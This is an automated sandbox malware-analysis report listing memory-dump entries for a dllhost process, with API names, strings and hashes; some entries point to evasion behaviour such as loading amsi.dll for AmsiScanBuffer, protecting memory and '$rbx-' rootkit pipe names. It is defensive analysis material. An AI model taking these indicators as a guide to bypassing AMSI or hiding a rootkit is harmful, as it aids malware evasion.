        • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction Fuzzy Hash: 4AD17C76208B8881DE70AB1AE49439E77B0F788B88F50055AEB8D47765DF3DC5D1CB90
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
        • String ID: \\.\pipe\$rbx-childproc
        • API String ID: 166002920-1828357524
        • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction ID: d1a7964b245bb8e1184509bbbb76e7c9bab5b2cdf7c0f23c106736facade0943
        • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction Fuzzy Hash: 5A111F3561878082EB109B25F4943997770F789BD4F944319EB5E06BA8DF7CC1C5CB90
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: fc5f30a136f48a5442bd0f2b42363be01bcd4a5137d34d94f5ca35998a5a5c22
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: 4181C131B0C741A6FE50BB6698C13E962B1EB85788F5448ADBB0D47796DB38C8C587F0
        APIs
        • LoadLibraryExW.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79B31
        • GetLastError.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79B3F
        • LoadLibraryExW.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79B69
        • FreeLibrary.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79BD7
        • GetProcAddress.KERNEL32(?,?,?,0000017C6DD79C6B,?,?,?,0000017C6DD7945C,?,?,?,?,0000017C6DD78F65), ref: 0000017C6DD79BE3
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Library$Load$AddressErrorFreeLastProc
        • String ID: api-ms-
        • API String ID: 2559590344-2084034818
        • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction ID: 02f9bc0bc3b9446bfb86b4985017de3f31b30b9c027b9edb852f88f7f13563f9
        • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction Fuzzy Hash: 0131823231AA4091EE12AB16A8C07E523B4F749BA0F99466DFF1D47794EF38D4C483A0
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Free$CurrentThread
        • String ID:
        • API String ID: 564911740-0
        • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction ID: c394335cb4c5d3176c403f97dfb6a8c60f2391a5c83877e2fb4333c893b79bc7
        • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction Fuzzy Hash: 8251A031209B8595EF15FB25ECD12E823B5BB04748F840969BB2D0A7A5EF78C5D9C3E0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID: $rbx-
        • API String ID: 756756679-3661604363
        • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction ID: c378ffdab85bded6d7e361fbacf73d94d03ecd43a39c50b2cc481718cd4f2b1e
        • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction Fuzzy Hash: 7F318E32709B5182EF15EF16E9807A9A3B0FB44B84F084068EF5D07B55EF34C4E18790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: FileWrite$ConsoleErrorLastOutput
        • String ID: \t9"1
        • API String ID: 2718003287-2818780629
        • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction ID: 6124af3dfeed8ef65d3a613b145d8a705f2cb490ffc3919e4477113ff062f65f
        • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
        • Instruction Fuzzy Hash: F8D1D432718A8489EB22DF69D4807EC3BB5F355798F40411AEF5E97B99DA34C1C6C3A0
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ErrorLast$Value$FreeHeap
        • String ID:
        • API String ID: 365477584-0
        • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction ID: 69478726ca235326263fd91c1b56380b2927ac65dabdfacccfa51f7b478454b6
        • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
        • Instruction Fuzzy Hash: 1A110D3120864086FE547735A8D57FE2271AB85791F94466CFA6E663CADE38D4C183E0
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID:
        • API String ID: 517849248-0
        • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction ID: 6a607ebe750b771e704191617441430e1e19e9c3cad12bd659ac9cd39d87a7aa
        • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
        • Instruction Fuzzy Hash: AB012131708B8086EB25EB12A4947A963B1F788FC0F484139AF5E43754DE3CC5C6C790
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
        • String ID:
        • API String ID: 449555515-0
        • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction ID: 60b933eac39f18cdee9f3844cea064595c7aa5db7395e3fffccd533750393632
        • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
        • Instruction Fuzzy Hash: A501407521978082FF25AB61F8887A573B4BB45B45F04012CEB4E06368EF3DC4C8C7A0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
        • String ID: \t9"1
        • API String ID: 2933794660-2818780629
        • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction ID: a718307440a95d6010f077f46a0e49642c078825958fd384491dda412827368b
        • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
        • Instruction Fuzzy Hash: 34110636754B048AEF009B61E8943A833B4F719B58F440A29EB6D867A4DB78C1E48390
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: FinalHandleNamePathlstrlen
        • String ID: \\?\
        • API String ID: 2719912262-4282027825
        • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction ID: 3e6adfbafb3e94503521bda1f9878d6557a2520877a3e5dc5897f1df9e9968b8
        • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction Fuzzy Hash: 14F04F7230868592EF20AB25F9D43E96371F745B88FC45129EB4E46A58DE6CC6C8CB60
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CombinePath
        • String ID: \\.\pipe\
        • API String ID: 3422762182-91387939
        • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction ID: 9ece0c00a92c3609b29d3100eba85d3ef457418991b2c8149778dd4f70a001fe
        • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction Fuzzy Hash: A2F08C74308B8082EE05AB13B9941A9A270BB48FC1F488538FF1F07B18CF2CC4C687A0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction ID: e1becc59d16ac5c9d6150d52f218d3f75485e216c7cae85a8c03312afa0e04ee
        • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction Fuzzy Hash: F4F0903121864181EE11AB24E8D57E96330EB89760F54021DEB7E457E4CF2CC4C8C3E0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: AddressLibraryLoadProcSleep
        • String ID: AmsiScanBuffer$amsi.dll
        • API String ID: 188063004-3248079830
        • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction ID: 7295b84dca63e21db4aa618676707eec946b595ce12f8f6f9432ecc59e35a3d8
        • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction Fuzzy Hash: 11D06730659640D5EE0A7B55ECE47E42271ABA4F01FC4165DE70F013A4DE2C85D993E0
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction ID: 5d583cce69cc50d4f0e355e5830df72f460481bbcb4d3eeaeeab1941a2a0ba3a
        • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction Fuzzy Hash: D551B13520868087EB35EB16E88069AB7B4F788B88F50411DBF4E43B54DB39C9C6CBD0
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction ID: b37ff17b52ace91dad0205cbcff8dd6f439ed3a03784214cb353fcef159a435c
        • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction Fuzzy Hash: 5A5192352186818BEB34EF16A8806AAB7B4F384B84F50415DEF4E43758DF39D9C6CB90
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction ID: 1d5a0fb19a357bc5da5ec4cb39e26b80e5aa499507de602fffe30c9fbc45b794
        • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction Fuzzy Hash: EE61C87652DB4486EB60EB15E49036AB7B0F388788F100159FB8D47BA8DB7DC5C4CB91
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModule
        • String ID:
        • API String ID: 1092925422-0
        • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction ID: d7dddea50c3efbf11adc2fceea1dcab2bb9cd0def0a6405d477c801de075c3bc
        • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction Fuzzy Hash: AC11423660974093EF25AB21E48469AA7B0FB45B84F44012AEF5D03798EB7DC9D8C7D4
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
        • String ID: csm
        • API String ID: 2395640692-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: 80345bdb2c88e1fb11a5445c5ff598060cc90306e893f22ca79c92cfc1fc0e9d
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 2951C0323196008AEF58EB65E484BAC37B2E354B98F548169FB4E47788DB79C8C1C790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CallEncodePointerTranslator
        • String ID: MOC$RCC
        • API String ID: 3544855599-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: 6ebae43ccba30faf210a1d6ed2121feee805390488258ef41c53080ea961fd90
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: 88618C32508BC485EB21AF25E480BDAB7B0F785B98F44525AFB9C13B99DB78C1D0CB50
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
